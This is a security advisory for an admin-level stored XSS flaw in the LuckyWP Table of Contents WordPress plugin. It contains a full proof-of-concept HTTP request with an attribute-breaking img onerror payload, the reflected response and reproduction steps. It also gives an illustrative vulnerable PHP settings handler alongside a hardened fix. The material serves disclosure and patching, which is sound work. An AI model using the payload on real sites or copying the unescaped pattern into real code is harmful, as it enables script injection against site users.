wpexploit | Sławomir Zakrzewski, Maksymilian Kubiak (AFINE) | WPEX-ID: ECD615F7-946E-45AF-A610-0654A243B1DC
Published: May 24, 2024 - 12:00 a.m.

LuckyWP Table of Contents <= 2.1.4 - Admin+ Stored XSS

Tags: luckywp table of contents, stored xss, vulnerability, plugin, update, poc, exploit, admin

AI Score: 5.6 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not sanitise and escape some of its settings (the Title, Label Show and Label Hide fields of its general settings), which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in a multisite setup). On a single-site install an administrator already holds unfiltered_html and may publish arbitrary HTML, so the issue matters where that capability has been removed: site administrators in a multisite network (only super admins keep it by default) or any install that defines DISALLOW_UNFILTERED_HTML. The settings form below shows the stored values being reflected straight into a value="" attribute, so the payload closes the attribute and injects an <img> tag.

Request:

POST /wordpress/wp-admin/options.php HTTP/1.1
Host: localhost:8888
Content-Length: 854
Origin: http://localhost:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost:8888/wordpress/wp-admin/options-general.php?page=lwptoc_settings&tab=general
Cookie: wordpress_2b7738476b2cfaf3b5454b1e89821e63=admin%7C1708766444%7C0GzMU59sZAvkYhj8ehqGOkvfh3o3aydrJhg1ZMemE1P%7C22974de7e91d95312e8cefa5f5c339f1696e50a12ec00e68ab0488447c2cafbf; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=pl_PL; wordpress_logged_in_2b7738476b2cfaf3b5454b1e89821e63=admin%7C1708766444%7C0GzMU59sZAvkYhj8ehqGOkvfh3o3aydrJhg1ZMemE1P%7C2d06dac1007e1bc6a183a19f4f01d66fecd7b809d5785a7974a3edc1a0dca85d; wp-settings-1=libraryContent%3Dupload%26editor%3Dhtml%26post_dfw%3Doff%26posts_list_mode%3Dlist; wp-settings-time-1=1708593645
Connection: close

option_page=lwptoc_general&action=update&_wpnonce=e60641c07f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dlwptoc_settings%26tab%3Dgeneral&lwptoc_general%5Bmin%5D=&lwptoc_general%5Bdepth%5D=6&lwptoc_general%5Bhierarchical%5D=0&lwptoc_general%5Bhierarchical%5D=1&lwptoc_general%5Bnumeration%5D=decimalnested&lwptoc_general%5BnumerationSuffix%5D=none&lwptoc_general%5Btitle%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&lwptoc_general%5Btoggle%5D=0&lwptoc_general%5Btoggle%5D=1&lwptoc_general%5BlabelShow%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E&lwptoc_general%5BlabelHide%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&lwptoc_general%5BhideItems%5D=0&lwptoc_general%5BhideItems%5D=1&lwptoc_general%5BsmoothScroll%5D=0&lwptoc_general%5BsmoothScroll%5D=1&lwptoc_general%5BsmoothScrollOffset%5D=&submit=Zapisz+zmiany


Response:

HTTP/1.1 200 OK
Server: nginx/1.19.2
Date: Thu, 22 Feb 2024 09:42:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Content-Length: 48359

[...]

<td><input class="js-lwptocToggleEl regular-text" type="text" name="lwptoc_general[labelShow]" value=""><img src=x onerror=alert(2)>"></input></td></tr><tr><th scope="row">Label Hide</th>

<td><input class="js-lwptocToggleEl regular-text" type="text" name="lwptoc_general[labelHide]" value=""><img src=x onerror=alert(3)>"></input></td>

<td><input class="regular-text" type="text" name="lwptoc_general[title]" value=""><img src=x onerror=alert(1)>"></input></td>

[...]

1. Go to the plugin's settings page (options-general.php?page=lwptoc_settings&tab=general).
2. Insert the following payload into the Title, Label Show, and Label Hide fields and save: "><img src=x onerror=alert(1)>
3. Add the Table of Contents block to a post or page in the Block Editor.
4. The alert fires. The payloads are also reflected unescaped in the settings form itself, as the response above shows.
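To make the root cause and the fix concrete, the following is an added example written for this page; it is not the plugin's own code. It uses the WordPress Settings API that the PoC request targets (option_page=lwptoc_general, with the title, labelShow and labelHide keys taken from the request). All function names, the customHtml field and the depth default are invented for illustration. The vulnerable half stores the posted array as-is and echoes it into an attribute; the hardened half registers a sanitize_callback and escapes on output.

```php
<?php
/**
 * Illustrative example added to this advisory; NOT code from the LuckyWP
 * Table of Contents plugin. Only the option group/name (lwptoc_general) and
 * the keys title, labelShow, labelHide come from the PoC request above. The
 * function names, the customHtml key and the depth default are made up.
 */

/* --- Vulnerable pattern: saved unsanitised, echoed unescaped --- */

function lwptoc_example_register_vulnerable() {
	// No sanitize_callback: options.php stores whatever the admin POSTs.
	register_setting( 'lwptoc_general', 'lwptoc_general' );
}

function lwptoc_example_text_field_vulnerable( $key ) {
	$opts  = get_option( 'lwptoc_general', array() );
	$value = isset( $opts[ $key ] ) ? $opts[ $key ] : '';
	// A stored value of "><img src=x onerror=alert(1)> closes the attribute
	// and the <input> tag, so the <img> is rendered and its onerror runs.
	echo '<input class="regular-text" type="text" name="lwptoc_general[' . $key . ']" value="' . $value . '">';
}

/* --- Hardened pattern: sanitise on save, escape on output --- */

function lwptoc_example_sanitize_general( $input ) {
	// options.php has already run wp_unslash() on $_POST before calling us.
	$input = is_array( $input ) ? $input : array();
	$clean = array();

	// Plain-text labels: sanitize_text_field() strips tags and control
	// characters, turning the PoC payload into a harmless `">`.
	foreach ( array( 'title', 'labelShow', 'labelHide' ) as $key ) {
		$clean[ $key ] = isset( $input[ $key ] ) ? sanitize_text_field( $input[ $key ] ) : '';
	}

	// Hypothetical field that is meant to accept markup: honour the
	// capability the advisory mentions. Users without unfiltered_html get
	// the wp_kses_post() allow-list instead of raw HTML.
	if ( isset( $input['customHtml'] ) ) {
		$clean['customHtml'] = current_user_can( 'unfiltered_html' )
			? $input['customHtml']
			: wp_kses_post( $input['customHtml'] );
	}

	// Numeric / boolean settings from the same form: coerce, don't trust.
	$clean['depth']        = isset( $input['depth'] ) ? absint( $input['depth'] ) : 6;
	$clean['hierarchical'] = ! empty( $input['hierarchical'] ) ? 1 : 0;

	return $clean;
}

function lwptoc_example_register_hardened() {
	register_setting(
		'lwptoc_general',
		'lwptoc_general',
		array(
			'type'              => 'array',
			'sanitize_callback' => 'lwptoc_example_sanitize_general',
			'default'           => array(),
		)
	);
}

function lwptoc_example_text_field_hardened( $key ) {
	$opts  = get_option( 'lwptoc_general', array() );
	$value = isset( $opts[ $key ] ) ? $opts[ $key ] : '';
	// esc_attr() encodes " < > & so the value can never leave the attribute,
	// even if an unsanitised value saved before the fix is still stored.
	printf(
		'<input class="regular-text" type="text" name="lwptoc_general[%s]" value="%s">',
		esc_attr( $key ),
		esc_attr( $value )
	);
}

add_action( 'admin_init', 'lwptoc_example_register_hardened' );
```

The same output escaping belongs wherever the stored title and labels are rendered outside the settings form, i.e. esc_html() for text nodes in the front-end and block-editor markup, since step 3 above is where the stored payload actually executes for a visitor. Sanitising on save alone does not clean values that were written before the fix, which is why both halves of the hardened pattern are needed.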

